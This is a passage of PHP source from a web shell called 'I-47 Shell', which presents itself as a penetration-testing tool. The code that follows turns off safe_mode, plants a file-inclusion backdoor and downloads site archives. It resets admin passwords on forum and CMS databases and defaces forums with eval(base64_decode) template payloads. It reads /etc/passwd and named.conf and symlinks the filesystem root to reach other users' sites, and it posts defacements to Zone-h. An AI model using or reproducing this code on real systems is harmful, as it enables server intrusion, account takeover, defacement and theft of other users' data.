1242. SecFilterScanPOST Off
1243. </IfModule>");
1244.  
1245. $file_pointer = fopen("ini.php", "w+");
1246. fwrite($file_pointer, "<?
1247. echo ini_get(\"safe_mode\");
1248. echo ini_get(\"open_basedir\");
1249. include(\$_GET[\"file\"]);
1250. ini_restore(\"safe_mode\");
1251. ini_restore(\"open_basedir\");
1252. echo ini_get(\"safe_mode\");
1253. echo ini_get(\"open_basedir\");
1254. include(\$_GET[\"ss\"]);
1255. ?>");
1256.  
1257. $file_pointer = fopen("php.ini", "w+");
1258. fwrite($file_pointer, "safe_mode = Off");
1259.  
1260. fclose($file_pointer);
1261. //echo "Safe Mode Is Now Off..";
1262. }
1263.  
1264. if(isset($_GET["downloadit"]))
1265. {
1266. $FolderToCompress = getcwd();
1267. execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
1268.  
1269. $prd=explode("/","backup.tar");
1270. for($i=0;$i<sizeof($prd);$i++)
1271. {
1272. $nfd=$prd[$i];
1273. }
1274. @ob_clean();
1275. header("Content-type: application/octet-stream");
1276. header("Content-length: ".filesize($nfd));
1277. header("Content-disposition: attachment; filename=\"".$nfd."\";");
1278. readfile($nfd);
1279.  
1280. exit;
1281. }
1282.  
1283. ?>
1284. <a href="javascript:history.back(1)"><font color=lime size="3"> [Back] </font></a>&nbsp;
1285. <a href="javascript:history.go(1)"><font color=lime size="3"> [Forward] </font></a>&nbsp;
1286. <a href=""><font color=lime size="3"> [Refresh] </font></a>&nbsp;
1287. <?php
1288.  
1289. if(isset($_POST['uploadurl']))
1290. {
1291. $functiontype = trim($_POST['functiontype']);
1292. $wurl = trim($_POST['wurl']);
1293. $path = magicboom($_POST['path']);
1294. $namafile = remotedownload($functiontype,$wurl);
1295. $fullpath = $path . $directorysperator . $namafile;
1296. if(is_file($fullpath))
1297. {
1298. echo "<center><font color=lime size=3>File uploaded to $fullpath</font></center>";
1299. }
1300. else
1301. echo "<center><font color=red size=3>Failed to upload $namafile</font></center>";
1302. }
1303.  
1304. // Install Php Proxy
1305. if (isset($_GET["phpproxy"]))
1306. {
1307. ?><br><center><table cellpadding="5" border="1" style="width:60%;">
1308. <tr><td colspan="2" align="center">
1309. <font color="#FF0000" size="4">Install PHP Based Proxy</font></td></tr><tr><td style="height:60px;" align="right">
1310. <form action=<?php echo $self; ?> method=GET>
1311. <input type=hidden name="act" value="phpproxy">
1312. <input type=hidden name="install" value="yup">
1313. <font color="#FF0000" size="3">Path to install in:</td><td><input type=text class="box" name="path" value="<?php echo $dir; ?>"> (must have final /)</td></font></tr><tr><td colspan="2" align="center" style="height:40px;">
1314. <input type=submit value="Install" class="but"></form></td></tr></table></center><br>
1315. <?php }
1316. else if(isset($_GET['install']))
1317. {
1318. if (is_writable($_GET['path']))
1319. {
1320. @$fh=fopen($_GET['path'].'proxy.php','w');
1321. @fwrite($fh,gzinflate(base64_decode($phpproxy)));
1322. @fclose($fh);
1323.  
1324. echo '<br><center><blink><font color=lime size=3>proxy.php was created in '.htmlentities($_GET['path']).'</font></blink></center><br><br>';
1325. chmod($_GET['path'].'/proxy.php', 0777);
1326. }else{
1327. echo '<br><center><font color=red size=3><b>Directory is not writable!</b><br></font></center><br>';
1328. }
1329. }
1330.  
1331. else if(isset($_GET['about']))
1332. { ?>
1333. <bR><center>
1334. <p><font color=red size=6><u>I-47 Shell v1.2</u></font><br>
1335. <font color=red size=5>[--==Coded By Arjun==--]</font><br>
1336. <br><font class="txt"><pre>
1337. ================================
1338. ----- / -------
1339. | / /
1340. | ___ /___| /
1341. | | /
1342. ----- | /
1343.  
1344. ================================
1345.  
1346. </pre></font></center>
1347. <font class="txt">I-47 Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsibe for any damage or misuse of it</font><br><br><center><font color=red size=5>GREETZ To All Indian Hackers</font><br><font color=red size=6>| &#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342; |</font></center><br>
1348. <?php }
1349.  
1350. // Zone-h Poster
1351. else if(isset($_GET["zone"]))
1352. {
1353. if(!function_exists('curl_version'))
1354. {
1355. echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1356. }
1357. ?>
1358. <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
1359. <form action="<?php echo $self; ?>" method="post">
1360. <table align="center" cellpadding="5" border="0">
1361. <tr>
1362. <td>
1363. <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
1364. <tr><td>
1365. <select name="hackmode" class="box">
1366. <option >--------SELECT--------</option>
1367. <option value="1">known vulnerability (i.e. unpatched system)</option>
1368. <option value="2" >undisclosed (new) vulnerability</option>
1369. <option value="3" >configuration / admin. mistake</option>
1370. <option value="4" >brute force attack</option>
1371. <option value="5" >social engineering</option>
1372. <option value="6" >Web Server intrusion</option>
1373. <option value="7" >Web Server external module intrusion</option>
1374. <option value="8" >Mail Server intrusion</option>
1375. <option value="9" >FTP Server intrusion</option>
1376. <option value="10" >SSH Server intrusion</option>
1377. <option value="11" >Telnet Server intrusion</option>
1378. <option value="12" >RPC Server intrusion</option>
1379. <option value="13" >Shares misconfiguration</option>
1380. <option value="14" >Other Server intrusion</option>
1381. <option value="15" >SQL Injection</option>
1382. <option value="16" >URL Poisoning</option>
1383. <option value="17" >File Inclusion</option>
1384. <option value="18" >Other Web Application bug</option>
1385. <option value="19" >Remote administrative panel access bruteforcing</option>
1386. <option value="20" >Remote administrative panel access password guessing</option>
1387. <option value="21" >Remote administrative panel access social engineering</option>
1388. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1389. <option value="23" >Access credentials through Man In the Middle attack</option>
1390. <option value="24" >Remote service password guessing</option>
1391. <option value="25" >Remote service password bruteforce</option>
1392. <option value="26" >Rerouting after attacking the Firewall</option>
1393. <option value="27" >Rerouting after attacking the Router</option>
1394. <option value="28" >DNS attack through social engineering</option>
1395. <option value="29" >DNS attack through cache poisoning</option>
1396. <option value="30" >Not available</option>
1397. </select>
1398. </td></tr>
1399. <tr><td>
1400. <select name="reason" class="box">
1401. <option >--------SELECT--------</option>
1402. <option value="1" >Heh...just for fun!</option>
1403. <option value="2" >Revenge against that website</option>
1404. <option value="3" >Political reasons</option>
1405. <option value="4" >As a challenge</option>
1406. <option value="5" >I just want to be the best defacer</option>
1407. <option value="6" >Patriotism</option>
1408. <option value="7" >Not available</option>
1409. </select></td></tr>
1410. <tr><td>
1411. <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
1412. <tr><td>
1413. <input type="submit" class="but" value="Send Now !" name="SendNowToZoneH" /></td></tr></table>
1414. </form>
1415. <?php }
1416.  
1417. // Password Change Forums
1418. else if(isset($_POST['forumpass']))
1419. {
1420. $localhost = $_POST['f1'];
1421. $database = $_POST['f2'];
1422. $username = $_POST['f3'];
1423. $password = $_POST['f4'];
1424. $prefix = $_POST['prefix'];
1425. $uid = $_POST['uid'];
1426. $newpass = $_POST['newpass'];
1427. if($_POST['forums'] == "vb")
1428. {
1429. $con = mysql_connect($localhost,$username,$password);
1430. $db = mysql_select_db($database,$con);
1431. $salt = "eghjghrtd";
1432. $newpassword = md5(md5($newpass) . $salt);
1433. if($prefix == "" || $prefix == null)
1434. $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1435. else
1436. $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1437. if($sql)
1438. {
1439. mysql_close($con);
1440. header("Location:$self?forum&passwordchange&changed");
1441. ob_end_flush();
1442. }
1443. else
1444. header("Location:$self?forum&passwordchange&cannotchange");
1445. }
1446. if($_POST['forums'] == "mybb")
1447. {
1448. $con = mysql_connect($localhost,$username,$password);
1449. $db = mysql_select_db($database,$con);
1450. $salt = "jeghj";
1451. $newpassword = md5(md5($salt).$newpass);
1452. if($prefix == "" || $prefix == null)
1453. $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1454. else
1455. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1456. if($sql)
1457. {
1458. mysql_close($con);
1459. header("Location:$self?forum&passwordchange&changed");
1460. ob_end_flush();
1461. }
1462. else
1463. header("Location:$self?forum&passwordchange&cannotchange");
1464. }
1465. if($_POST['forums'] == "smf")
1466. {
1467. $con = mysql_connect($localhost,$username,$password);
1468. $db = mysql_select_db($database,$con);
1469. $salt = "eghj";
1470.  
1471. if($prefix == "" || $prefix == null)
1472. {
1473. $result = mysql_query("select member_name from smf_members where id_member = 1");
1474. $row = mysql_fetch_array($result);
1475. $membername = $row['member_name'];
1476. $newpassword = sha1(strtolower($membername).$newpass);
1477. $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1478. }
1479. else
1480. {
1481. $result = mysql_query("select member_name from ".$prefix."members where id_member = 1");
1482. $row = mysql_fetch_array($result);
1483. $membername = $row['member_name'];
1484. $newpassword = sha1(strtolower($membername).$newpass);
1485. $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1486. }
1487. if($sql)
1488. {
1489. mysql_close($con);
1490. header("Location:$self?forum&passwordchange&changed");
1491. ob_end_flush();
1492. }
1493. else
1494. header("Location:$self?forum&passwordchange&cannotchange");
1495. }
1496. if($_POST['forums'] == "phpbb")
1497. {
1498. $con = mysql_connect($localhost,$username,$password);
1499. $db = mysql_select_db($database,$con);
1500.  
1501. $newpassword = md5($newpass);echo $newpassword;
1502. if(empty($prefix) || $prefix == null)
1503. $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where user_id = '$uid'");
1504. else
1505. $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1506. if($sql)
1507. {
1508. mysql_close($con);
1509. header("Location:$self?forum&passwordchange&changed");
1510. ob_end_flush();
1511. }
1512. else
1513. header("Location:$self?forum&passwordchange&cannotchange");
1514. }
1515. if($_POST['forums'] == "ipb")
1516. { echo "gjhfg";
1517. $con = mysql_connect($localhost,$username,$password);
1518. $db = mysql_select_db($database,$con);
1519. $salt = "eghj";
1520. $newpassword = md5(md5($salt).md5($newpass));
1521. if($prefix == "" || $prefix == null)
1522. $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1523. else
1524. $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1525. if($sql)
1526. {
1527. mysql_close($con);
1528. header("Location:$self?forum&passwordchange&changed");
1529. ob_end_flush();
1530. }
1531. else
1532. header("Location:$self?forum&passwordchange&cannotchange");
1533. }
1534. if($_POST['forums'] == "wp")
1535. {
1536. $uname = $_POST['uname'];
1537. $con = mysql_connect($localhost,$username,$password);
1538. $db = mysql_select_db($database,$con);
1539.  
1540. $newpassword = md5($newpass);
1541. if($prefix == "" || $prefix == null)
1542. $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1543. else
1544. $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1545. if($sql)
1546. {
1547. mysql_close($con);
1548. header("Location:$self?forum&passwordchange&changed#wordp");
1549. ob_end_flush();
1550. }
1551. else
1552. header("Location:$self?forum&passwordchange&cannotchange#wordp");
1553. }
1554. if($_POST['forums'] == "joomla")
1555. {
1556. $uname = $_POST['uname'];
1557. $con = mysql_connect($localhost,$username,$password);
1558. $db = mysql_select_db($database,$con);
1559.  
1560. $newpassword = md5($newpass);
1561. if($prefix == "" || $prefix == null)
1562. $sql = mysql_query("update jos_users set password = '$newpassword', username = '$uname' where name = 'Super User'");
1563. else
1564. $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$uname' where name = 'Super User' OR name = 'Administrator'");
1565. if($sql)
1566. {
1567. mysql_close($con);
1568. header("Location:$self?forum&passwordchange&changed#jooml");
1569. ob_end_flush();
1570. }
1571. else
1572. header("Location:$self?forum&passwordchange&cannotchange#jooml");
1573. }
1574. }
1575.  
1576. // Deface Forums
1577. else if(isset($_POST['forumdeface']))
1578. {
1579. $localhost = $_POST['f1'];
1580. $database = $_POST['f2'];
1581. $username = $_POST['f3'];
1582. $password = $_POST['f4'];
1583. $index = $_POST['index'];
1584. $prefix = $_POST['prefix'];
1585. if($_POST['forumdeface'] == "Hack VB")
1586. {
1587. if($database=$_POST['f2'])
1588. {
1589. $con =@ mysql_connect($localhost,$username,$password) or die;
1590. $db =@ mysql_select_db($database,$con) or die;
1591. $index=str_replace('"','\\"',$index);
1592. $attack = "{\${eval(base64_decode(\'";
1593. $attack .= base64_encode("echo \"$index\";");
1594. $attack .= "\'))}}{\${exit()}}</textarea>";
1595. if($prefix == "" || $prefix == null)
1596. $query = "UPDATE template SET template = '$attack'" or die;
1597. else
1598. $query = "UPDATE ".$prefix."template SET template = '$attack'" or die;
1599. $result =@ mysql_query($query,$con);
1600. if($result)
1601. {
1602. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1603. }
1604. else
1605. {
1606. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1607. }
1608. }
1609. }
1610. else if($_POST['forumdeface'] == "Hack MyBB")
1611. {
1612. $localhost = $_POST['f1'];
1613. $database = $_POST['f2'];
1614. $username = $_POST['f3'];
1615. $password = $_POST['f4'];
1616. $index = $_POST['index'];
1617. $prefix = $_POST['prefix'];
1618. if($database=$_POST['f2'])
1619. {
1620. $con =@ mysql_connect($localhost,$username,$password) or die;
1621. $db =@ mysql_select_db($database,$con) or die;
1622. //$index=str_replace('"','\"',$index);
1623. $attack = "{\${eval(base64_decode(\'";
1624. $attack .= base64_encode("echo \"$index\";");
1625. $attack .= "\'))}}{\${exit()}}</textarea>";
1626. $attack = str_replace('"',"\\'",$attack);
1627.  
1628. echo $attack;
1629. //$index=str_replace("'","\\'",$index);
1630. if($prefix == "" || $prefix == null)
1631. $query = "UPDATE mybb_templates SET template = '$attack'" or die;
1632. else
1633. $query = "UPDATE ".$prefix."templates SET template = '$attack'" or die;
1634. $result =@ mysql_query($query,$con);
1635. if($result)
1636. {
1637. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1638. }
1639. else
1640. {
1641. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1642. }
1643. }
1644. }
1645. else if($_POST['forumdeface'] == "Hack SMF")
1646. {
1647. $localhost = $_POST['f1'];
1648. $database = $_POST['f2'];
1649. $username = $_POST['f3'];
1650. $password = $_POST['f4'];
1651. $index = $_POST['index'];
1652. $prefix = $_POST['prefix'];
1653. if($database = $_POST['f2'])
1654. {
1655. $con =@ mysql_connect($localhost,$username,$password) or die;
1656. $db =@ mysql_select_db($database,$con) or die;
1657. if($prefix == "" || $prefix == null)
1658. $query = "UPDATE smf_categories SET name='$index' WHERE id_cat='$catid'" or die;
1659. else
1660. $query = "UPDATE ".$prefix."categories SET name='$index' WHERE id_cat='$catid'" or die;
1661. $result =@ mysql_query($query,$con);
1662. if($result)
1663. {
1664. echo "<center><font color=lime size=4><blink>Forum Index Changed Successfully</blink></font></center>";
1665. }
1666. else
1667. {
1668. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1669. }
1670. }
1671. }
1672. else if($_POST['forumdeface'] == "Hack IPB")
1673. {
1674. $localhost = $_POST['f1'];
1675. $database = $_POST['f2'];
1676. $username = $_POST['f3'];
1677. $password = $_POST['f4'];
1678. $index = $_POST['index'];
1679. if($database=$_POST['f2'])
1680. {
1681. $IPB = "ibf_skin_sets";
1682. $con =@ mysql_connect($localhost,$username,$password) or die;
1683. $db =@ mysql_select_db($database,$con) or die;
1684. $query = "UPDATE $IPB SET set_cache_wrapper = '$index'" or die;
1685. $result =@ mysql_query($query,$con);
1686. if($result)
1687. {
1688. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1689. }
1690. else
1691. {
1692. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1693. }
1694. }
1695. }
1696. else if($_POST['forumdeface'] == "Hack wordpress")
1697. {
1698. $localhost = $_POST['f1'];
1699. $database = $_POST['f2'];
1700. $username = $_POST['f3'];
1701. $password = $_POST['f4'];
1702. $catid = $_POST['f5'];
1703. $index = $_POST['index'];
1704. $prefix = $_POST['prefix'];
1705. if($database=$_POST['f2'])
1706. {
1707. $con =@ mysql_connect($localhost,$username,$password) or die;
1708. $db =@ mysql_select_db($database,$con) or die;
1709. if($prefix == "" || $prefix == null)
1710. $query = "UPDATE wp_posts SET post_title='$index' WHERE ID='$catid'" or die;
1711. else
1712. $query = "UPDATE ".$prefix."posts SET post_title='$index' WHERE ID='$catid'" or die;
1713. $result =@ mysql_query($query,$con);
1714. if($result)
1715. {
1716. echo "<center><font color=lime size=4><blink>Forum Defaced Successfully</blink></font></center>";
1717. }
1718. else
1719. {
1720. echo "<center><font color=red size=4><blink>Cannot Deface Forum</blink></font></center>";
1721. }
1722. }
1723. }
1724. }
1725.  
1726.  
1727. // Get Domains
1728. else if(isset($_GET["symlinkserver"]))
1729. {
1730. ?>
1731. <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver"><font color="lime" size="4">| Get Domains |</font></a></td>
1732. <td><a href="<?php echo $self; ?>?users&symlinkserver"><font color="lime" size="4">| Users & Domains |</font></a></td>
1733. <td><a href="<?php echo $self; ?>?symlink&symlinkserver"><font color="lime" size="4">| Symlink Server |</font></a></td>
1734. <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver"><font color="lime" size="4">| Symlink File |</font></a></td>
1735. </tr></table></center><br>
1736. <?php
1737. if(isset($_GET["domains"]))
1738. {
1739. ?> <center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center>
1740. <?php }
1741. else if(isset($_GET["users"]))
1742. {
1743. $d0mains = @file("/etc/named.conf");
1744.  
1745. if(!$d0mains)
1746. {
1747. die("<center><font size=4 color=red>cannot ReaD -> [ /etc/named.conf ]</font><center>");
1748. }
1749.  
1750. $url = 'http://'.$_SERVER['SERVER_NAME'];
1751.  
1752. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td></tr>";
1753.  
1754. foreach($d0mains as $d0main)
1755. {
1756. if(eregi("zone",$d0main))
1757. {
1758. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1759. flush();
1760.  
1761. if(strlen(trim($domains[1][0])) > 2)
1762. {
1763. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1764.  
1765. echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=lime>".$domains[1][0]."</font></a></td><td><font size=3 color=lime>" . $user['name']. "</font></td></tr>";
1766. flush();
1767.  
1768. }
1769. }
1770. }
1771. echo "</table>";
1772. }
1773. else if(isset($_GET["symlink"]))
1774. {
1775. $d0mains = @file("/etc/named.conf");
1776.  
1777. if($d0mains)
1778. {
1779. @mkdir("I47",0777);
1780. @chdir("I47");
1781. execmd("ln -s / root");
1782. $file3 = 'Options all
1783. DirectoryIndex Sux.html
1784. AddType text/plain .php
1785. AddHandler server-parsed .php
1786. AddType text/plain .html
1787. AddHandler txt .html
1788. Require None
1789. Satisfy Any
1790. ';
1791. $fp3 = fopen('.htaccess','w');
1792. $fw3 = fwrite($fp3,$file3);
1793. @fclose($fp3);
1794. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
1795.  
1796. foreach($d0mains as $d0main)
1797. {
1798. if(eregi("zone",$d0main))
1799. {
1800. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1801. flush();
1802.  
1803. if(strlen(trim($domains[1][0])) > 2)
1804. {
1805. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1806.  
1807. echo "<tr><td><a href=http://www.".$domains[1][0]."/><font size=3 color=lime>".$domains[1][0]."</font></a></td><td><font size=3 color=lime>".$user['name']."</font></td><td><a href='/I47/root/home/".$user['name']."/public_html' target='_blank'><font size=3 color=lime>Symlink</font></a></td></tr>"; flush();
1808.  
1809. }
1810. }
1811. }
1812. echo "</table>";
1813. }
1814. else
1815. {
1816. $TEST=@file('/etc/passwd');
1817. if ($TEST)
1818. {
1819. @mkdir("I47",0777);
1820. @chdir("I47");
1821. execmd("ln -s / root");
1822. $file3 = 'Options all
1823. DirectoryIndex Sux.html
1824. AddType text/plain .php
1825. AddHandler server-parsed .php
1826. AddType text/plain .html
1827. AddHandler txt .html
1828. Require None
1829. Satisfy Any
1830. ';
1831. $fp3 = fopen('.htaccess','w');
1832. $fw3 = fwrite($fp3,$file3);
1833. @fclose($fp3);
1834.  
1835. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
1836.  
1837. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
1838. //Output a line of the file until the end is reached
1839. while(!feof($file))
1840. {
1841. $s = fgets($file);
1842. $matches = array();
1843. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1844. $matches = str_replace("home/","",$matches[1]);
1845. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1846. continue;
1847. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
1848. echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1849. }
1850. fclose($file);
1851.  
1852. echo "</table>";
1853. }
1854. else
1855. {
1856.  
1857. @mkdir("I47",0777);
1858. @chdir("I47");
1859. execmd("ln -s / root");
1860. $file3 = 'Options all
1861. DirectoryIndex Sux.html
1862. AddType text/plain .php
1863. AddHandler server-parsed .php
1864. AddType text/plain .html
1865. AddHandler txt .html
1866. Require None
1867. Satisfy Any
1868. ';
1869. $fp3 = fopen('.htaccess','w');
1870. $fw3 = fwrite($fp3,$file3);
1871. @fclose($fp3);
1872.  
1873. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
1874.  
1875. $temp = "";
1876. $val1 = 0;
1877. $val2 = 1000;
1878. for(;$val1 <= $val2;$val1++)
1879. {
1880. $uid = @posix_getpwuid($val1);
1881. if ($uid)
1882. $temp .= join(':',$uid)."\n";
1883. }
1884. echo '<br/>';
1885. $temp = trim($temp);
1886.  
1887. $file5 = fopen("test.txt","w");
1888. fputs($file5,$temp);
1889. fclose($file5);
1890.  
1891. $file = fopen("test.txt", "r") or exit("Unable to open file!");
1892. while(!feof($file))
1893. {
1894. $s = fgets($file);
1895. $matches = array();
1896. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1897. $matches = str_replace("home/","",$matches[1]);
1898. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1899. continue;
1900. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
1901. echo "<td align=center><font size=3 color=lime><a href=/I47/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
1902. }
1903. fclose($file);
1904. echo "</table>";
1905. unlink("test.txt");
1906. }
1907. }
1908. }
1909. else if(isset($_GET["symlinkfile"]))
1910. {
1911. if(!isset($_GET['file']))
1912. {
1913. ?>
1914. <center>
1915. <form action="<?php echo $self; ?>">
1916. <input type="hidden" name="symlinkserver">
1917. <input type="hidden" name="symlinkfile">
1918. <input type="text" class="box" name="file" size="50" value="">
1919. <input type="submit" value="Create Symlink" class="but">
1920. </form></center>
1921. <br><br>
1922. <?php
1923. }
1924. else
1925. {
1926. $fakedir="cx";
1927. $fakedep=16;
1928.  
1929. $num=0; // offset of symlink.$num
1930.  
1931. if(!empty($_GET['file'])) $file=$_GET['file'];
1932. else if(!empty($_POST['file'])) $file=$_POST['file'];
1933. else $file="";
1934.  
1935. if(empty($file))
1936. exit;
1937.  
1938. if(!is_writable("."))
1939. die("not writable directory");
1940.  
1941. $level=0;
1942.  
1943. for($as=0;$as<$fakedep;$as++){
1944. if(!file_exists($fakedir))
1945. mkdir($fakedir);
1946. chdir($fakedir);
1947. }
1948.  
1949. while(1<$as--) chdir("..");
1950.  
1951. $hardstyle = explode("/", $file);
1952.  
1953. for($a=0;$a<count($hardstyle);$a++){
1954. if(!empty($hardstyle[$a])){
1955. if(!file_exists($hardstyle[$a]))
1956. mkdir($hardstyle[$a]);
1957. chdir($hardstyle[$a]);
1958. $as++;
1959. }
1960. }
1961. $as++;
1962. while($as--)
1963. chdir("..");
1964.  
1965. @rmdir("fakesymlink");
1966. @unlink("fakesymlink");
1967.  
1968. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
1969.  
1970. // this loop will skip allready created symlinks.
1971. while(1)
1972. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
1973. else $num++;
1974.  
1975. @unlink("fakesymlink");
1976. mkdir("fakesymlink");
1977.  
1978. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
1979.  
1980. }
1981. }
1982. }
1983.  
1984. // Exploit Search
1985. else if(isset($_GET["exploit"]))
1986. {
1987. if(!isset($_GET["rootexploit"]))
1988. {
1989. ?>
1990. <center>
1991. <form action="<?php echo $self; ?>" method="get" target="_blank">
1992. <input type="hidden" name="exploit">
1993. <table border="1" cellpadding="5" cellspacing="4" style="width:50%;">
1994. <tr>
1995. <td style="height:60px;">
1996. <font size="4" color="lime">Select Website</font></td><td>
1997. <p><select id="rootexploit" name="rootexploit" class="box">
1998. <option value="exploit-db">Exploit-db</option>
1999. <option value="packetstormsecurity">Packetstormsecurity</option>
2000. <option value="exploitsearch">Exploitsearch</option>
2001. <option value="shodanhq">Shodanhq</option>
2002. </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
2003. <input type="submit" value="Search" class="but"></td></tr></table>
2004. </form></center><br>
2005.  
2006. <?php
2007. }
2008. else
2009. {
2010. //exploit search
2011. $Lversion = php_uname(r);
2012. $OSV = php_uname(s);
2013. if(eregi('Linux',$OSV))
2014. {
2015. $Lversion=substr($Lversion,0,6);
2016. if($_GET['rootexploit'] == "exploit-db")
2017. {
2018. header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
2019. }
2020. else if($_GET['rootexploit'] == "packetstormsecurity")
2021. {
2022. header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
2023. }
2024. else if($_GET['rootexploit'] == "exploitsearch")
2025. {
2026. header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
2027. }
2028. else if($_GET['rootexploit'] == "shodanhq")
2029. {
2030. header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
2031. }
2032. }
2033. else
2034. {
2035. $Lversion=substr($Lversion,0,3);
2036. if($_GET['rootexploit'] == "exploit-db")
2037. {
2038. header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
2039. }
2040. else if($_GET['rootexploit'] == "packetstormsecurity")
2041. {
2042. header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
2043. }
2044. else if($_GET['rootexploit'] == "exploitsearch")
2045. {
2046. header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
2047. }
2048. else if($_GET['rootexploit'] == "shodanhq")
2049. {
2050. header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
2051. }
2052. }
2053. //End of Exploit search
2054. }
2055.  
2056. }
2057.  
2058. else if(isset($_POST["SendNowToZoneH"]))
2059. {
2060. $hacker = $_POST['defacer'];
2061. $method = $_POST['hackmode'];
2062. $neden = $_POST['reason'];
2063. $site = $_POST['domain'];
2064.  
2065. if (empty($hacker))
2066. {
2067. die("<center><font color=red size=3>[-] You Must Fill the Attacker name !</font></center>");
2068. }
2069. elseif($method == "--------SELECT--------")
2070. {
2071. die("<center><font color=red size=3>[-] You Must Select The Method !</center>");
2072. }
2073. elseif($neden == "--------SELECT--------")
2074. {
2075. die("<center><font color=red size=3>[-] You Must Select The Reason</center>");
2076. }
2077. elseif(empty($site))
2078. {
2079. die("<center><font color=red size=3>[-] You Must Inter the Sites List !</center>");
2080. }
2081.  
2082. $i = 0;
2083. $sites = explode("\n", $site);
2084. echo "<pre class=ml1 style='margin-top:5px'>";
2085. while($i < count($sites))
2086. {
2087. if(substr($sites[$i], 0, 4) != "http")
2088. {
2089. $sites[$i] = "http://".$sites[$i];
